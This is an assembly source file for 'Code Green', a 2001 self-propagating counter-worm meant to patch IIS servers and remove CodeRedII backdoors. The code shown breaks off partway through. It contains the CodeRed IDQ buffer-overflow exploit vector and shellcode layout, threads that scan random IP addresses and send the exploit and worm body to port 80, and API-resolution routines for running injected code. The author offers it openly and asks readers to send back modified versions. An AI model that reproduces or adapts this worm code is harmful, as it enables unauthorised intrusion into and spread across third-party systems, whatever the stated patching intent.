📄 codegreen.asm
字号:
; Code Green (AntiCodeRed/IDQPatcher/whatever you want) V1.0 BETA [23.08.2001]
; assemble with:
; ML /Dmasm /c /Cx /coff CodeGreen.asm
; link with:
; LINK CodeGreen.obj /entry:_Entry /subsystem:windows /base:65536
;aims:
; * patch vulnerable systems
; * remove CodeRedII backdoors
;known problems:
; * plenty of probs ... ;(
; * propagation threads will stop (criticalsection), in case only one thread should block while sending
; * don't know if CodeGreen will correctly determine system language
; * don't know if CG will correctly apply patch to all systems
; * don't know if this code would work at all (had not enough time to exessively debug it;()
;known bugs:
; * currently none (inform me if you should find some weak code)
;credits:
; * @eEye: you guys surely did great work finding that bug
; * @MS: thanks for delivering a hotfix that works with system privileges
; (plus: does not show messagebox when executed with system privileges;))
; * @CodeRedI author: thanks for this great exploit vector; good job
; * @CodeRedII author: sorry for providing code/the base for a code
; that will/could potentially take your systems
; * @all: it's my first one ...
; ... so please don't flame me for weak coding ...
; ... be nice guys and send me your modified versions of this code.
;debug instructions:
; * assemble CodeGreen.asm
(or remove txt-extension from CodeGreen.exe.txt [at your own risk])
; * debug your iis
; * go to 0x7801CBD3h (call ebx)
; * set breakpoint there
; * execute betaversion and walk through the code
; * be sure to stay offline, especially when using the preassembled version
;DISCLAIMER:
; (blahblah) ... i will not take responsibility for any bugy in this code
;(THIS IS ONLY A BETA VERSION, WHICH HAS BUGS IN IT).
;in fact i will not take responsibility for this code/included files at all.
;if you use this code or the pre-assembled version, you should know what you are doing.
;hell ... if you can't keep the code on your local iis, it's your fault.
;(i really don't know if this code is working at all
; ... currently it's 10:20 a.m. in germany and it's getting pretty late ...
; ... but tomorry i will be on vacation and perhaps there might be someone out there,
; who could finish my work.)
;sidenote: i did not have the time to optimize the code and to
write some nice comments; sorry.
.386
.model flat, stdcall
option casemap:none
; ***** ***** Includes ***** *****
include windows.inc
include kernel32.inc
include advapi32.inc
include wsock32.inc
includelib kernel32.lib
includelib advapi32.lib
includelib wsock32.lib
CGLen EQU CGEnd - CGBegin
CGInitLen EQU CGEnd - CGInit
UDataLen EQU UDataEnd - UDataBegin
.Code
CGInit EQU $
_Entry:
.Data
OldProtection DD 0
.Code
call AdjustCodeSegment
AdjustCodeSegment:
pop ebp
mov eax, CGInitLen
invoke VirtualProtect, ebp, eax, PAGE_EXECUTE_READWRITE, offset OldProtection
cmp eax, TRUE
je _Prologue2
INT 3
call GetLastError
ret
_Prologue2:
.Data
msvcrt_dll DB "msvcrt.dll", 0
.Code
invoke LoadLibrary, offset msvcrt_dll
mov esi, eax ;esi -> msvcrt.dll
add esi, 00050824h
cmp eax, NULL
jne _DEBUG ;_CGEntry
INT 3
call GetLastError
ret
_DEBUG:
call LaengeCodeGreenCodeBerechnen
_CGInit:
.Data
CGInit_WSAData DW 0
DW 0
DB 257 DUP (0)
DB 257 DUP (0)
DW 0
DW 0
DD 0
CGInit_CurrentIP DD 7F000001h
CGInit_IoctlSocket_Arg DD 0
CGInit_SockAddr DW 0
DW 0
DD 0
DD 2 DUP (0)
CGInit_fd_set DD 1
DD 1
DD 63 DUP (0)
.Data?
CGInit_CGCodeLen DD 0 ;Code
CGInit_CGLen DD 0 ;Exploit+Code
CGInit_NewCodeGreen DB 6000 DUP (?)
.Code
call LaengeCodeGreenCodeBerechnen
xor ebp, ebp ;set initial base-pointer
jmp CGInit_Get_Used_PropagationThreadFunctions
LaengeCodeGreenCodeBerechnen:
pushad
mov eax, CGLen
mov [CGInit_CGCodeLen], eax
lea esi, CodeGreenExploitLenStr
xor edx, edx
mov ecx, 1000
div ecx ;EDX-EAX:ECX Rest:edx Erg:eax
add eax, 48
mov [esi], al
mov eax, edx
xor edx, edx
mov ecx, 100
div ecx
add eax, 48
mov [esi+1], al
mov eax, edx
xor edx, edx
mov ecx, 10
div ecx
add eax, 48
mov [esi+2], al
mov eax, edx
add eax, 48
mov [esi+3], al
popad
ret
CGInit_Get_Used_PropagationThreadFunctions:
mov eax, EnterCriticalSection
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_EnterCriticalSection], eax
mov eax, LeaveCriticalSection
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_LeaveCriticalSection], eax
mov eax, socket
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_socket], eax
mov eax, ioctlsocket
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_ioctlsocket], eax
mov eax, connect
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_connect], eax
mov eax, select
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_select], eax
mov eax, send
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_send], eax
mov eax, closesocket
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_closesocket], eax
mov eax, GetSystemTime
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_GetSystemTime], eax
mov eax, Sleep
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_Sleep], eax
CGInit_BuildCodeGreen:
lea esi, [ebp][CodeGreenExploit]
mov eax, CGExploitLen + CGLen
mov ecx, eax
shr ecx, 2 ;div 4
inc ecx
mov ebx, ecx ;ebx: NrOfPushs
CGInit_ReserveStackLoop:
push 090909090h
loop CGInit_ReserveStackLoop
push ebx ;first DW in stack-field holds NrOfPushs
mov [ebp][ptrNewCodeGreen], esp
CGInit_CopyCodeGreenExploit:
mov ecx, CGExploitLen ;eax
lea edi, [esp+4]
cld
rep movsb
CGInit_AddCodeGreenCode:
lea esi, [ebp][_CGEntry]
mov ecx, CGLen
rep movsb
CGInit_StartPropagation:
mov [ebp][NrOfThreads], word ptr 0
mov [ebp][EndThreadsFlag], byte ptr 0
mov [ebp][CurrentIP], dword ptr 7F000000h ;does propagation thread only send one copy to the local IIS?
;7FFFFFFDh ;=127.255.255.254 => no random IP generation, hits local Port 80 1 time
CGInit_InitializeSockets:
push offset CGInit_WSAData
push 0101h
CALL WSAStartup
CGInit_Main_StartRandomGenerator:
push 0
push esp
push 0
push ebp
lea eax, [ebp][RandomGenerator]
push eax
push 0
push 0
CALL CreateThread
pop eax
CGInit_Initialise_Critical_Sections:
lea eax, [ebp][CritSec_GetIP]
push eax
CALL InitializeCriticalSection
lea eax, [ebp][CritSec_SendCG]
push eax
CALL InitializeCriticalSection
CGInit_Propagation_ThreadLoop:
push 0
push esp
push 0
push ebp
lea eax, [ebp][_ThreadFunction]
push eax
push 0
push 0
CALL CreateThread
pop eax
push 100
CALL Sleep
cmp [ebp][NrOfThreads], word ptr MAX_NR_OF_THREADS
jl CGInit_Propagation_ThreadLoop
CGInit_ResetPropagation:
CGInit_Main_WaitLoop:
push 60000 ;60 secs
CALL Sleep
CGInit_Main_StartRandomIPSearchAgain:
lea edx, [ebp][CritSec_GetIP] ;EnterCriticalSection
push edx
CALL EnterCriticalSection
mov [ebp][CurrentIP], dword ptr 0
lea edx, [ebp][CritSec_GetIP] ;LeaveCriticalSection
push edx
CALL LeaveCriticalSection
jmp CGInit_Main_WaitLoop
;*********************************************************************************************************************************
;************************************************ EXPLOIT VECTOR *************************************************************
;*********************************************************************************************************************************
;esp: 7801CBD3h; [7801CBD3]: FF 29 call ebx
; ->00D3F0E8 90 nop
; 00D3F0E9 90 nop
; 00D3F0EA 58 ! pop eax
; 00D3F0EB 68 D3 CB 01 78 ! push 7801CBD3h
; 00D3F0F0 90 nop
; 00D3F0F1 90 nop
; 00D3F0F2 90 nop
; 00D3F0F3 90 nop
; 00D3F0F4 90 nop
; 00D3F0F5 81 C3 00 03 00 00 add ebx,300h
; 00D3F0FB 8B 1B mov ebx,dword ptr [ebx]
; 00D3F0FD 53 ! push ebx (ebx: 00B02698h)
; 00D3F0FE FF 53 78 ! call dword ptr [ebx+78h] pushes 00D3F100h
;Stack:
; [esp]: 00D3F100h, 00B02698h(esp+4), 7801CBD3h(esp+8)
;*********************************************************************************************************************************
;************************************************** WORM CODE ****************************************************************
;*********************************************************************************************************************************
CGBegin EQU $
_CGEntry:
call _GetEIP
_GetEIP:
;00011000 E8 00 00 00 00 call 00011005
;00011005 5D pop ebp ;ebp > 00011005 z.B. ebp=00401005
;00011006 B8 06 10 01 00 mov eax,11006h
;0001100B 48 dec eax ;eax=11005 (STATISCH!)
;0001100C 55 push ebp
;0001100D 2B E8 sub ebp,eax ;ebp = ebp - eax => Variablenangleichung m鰃lich!
;0001100F 58 pop eax
;00011010 83 E8 05 sub eax,5 ;eax -> _Entry => wir haben komfortablen Zeiger auf den VirenCode!
pop ebp
mov eax, $
dec eax ;eax=11005 (STATISCH!); d.h.: eax zeigt auf "pop ebp"
push ebp
sub ebp, eax ;ebp -> (_CGEntry - eax); d.h.: ebp + offset VAR = EffectiveAddressOf Var
pop eax
sub eax, 5 ;eax -> _CGEntry (VARIABEL!)
;mov [ebp][BasePointerCode], eax
push ebp ;Push the BasePointer to stack
;**********************************************************************************
;*** init ***
;**********************************************************************************
_GetMsvcrtBaseAndSearchGetProcAddrEntry:
mov esi, 78000000h ;[esp+12] ;esi: 7801CBD3h (see above)
;call SearchMZHeader
lea ebx, [ebp][Str_GetProcAddr]
mov ecx, Len_GetProcAddr
mov ebp, dword ptr esi
mov esi, dword ptr [esi+3Ch]
add esi, ebp
mov esi, dword ptr [esi+80h] ;78h=ExportTable 80h=ImportTable
add esi, ebp
mov edi, esi ;edi -> ImageImportTable
sub edi, 14h
SearchIMAGE_IMPORT_DESCRIPTORs:
add edi, 14h ;edi -> nextImportDescriptor
mov esi, [edi+12] ;esi -> Name
add esi, ebp
mov esi, [esi]
cmp esi, "NREK"
jne SearchIMAGE_IMPORT_DESCRIPTORs
IMAGE_KERNEL_IMPORT_DESCRIPTOR_Found: ;edi -> KernelImportDescriptor
mov esi, [edi+10h] ;esi -> PIMAGE_THUNK_DATA (Address-Table)
add esi, ebp ;[ebp][MsvcrtBase]
mov edi, [edi] ;edi -> IMAGE_IMPORT_BY_NAME - Pointers (Name-Table)
add edi, ebp ;[ebp][MsvcrtBase]
xchg ebx, esi ;ebx=esi; esi -> Str_GetProcAddr
xor edx, edx ;edx : Z鋒ler
cld
SearchPointerTableLoop:
inc edx
pushad
add [esp], dword ptr 4 ;"add edi, 4" after "popad"
mov edi, [edi]
add edi, ebp
add edi, 2 ;edi -> ProcName ;shl edi ...
CompareTheTwoNames:
repe cmpsb
popad
jnz SearchPointerTableLoop ;the strings are not equal
FunctionFound: ;edx: NrIn_IMPORT_TABLE
dec edx
shl edx, 2 ;edx=edx*4
add ebx, edx
mov edx, [ebx] ;EDX: GetProcAddr
pop ebp
mov [ebp][ProcTable+API_GetProcAddr], edx
mov esi, edx
call SearchMZHeader ;esi -> KernelBase
lea edi, [ebp][DllTable]
push edi
mov [edi], esi
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -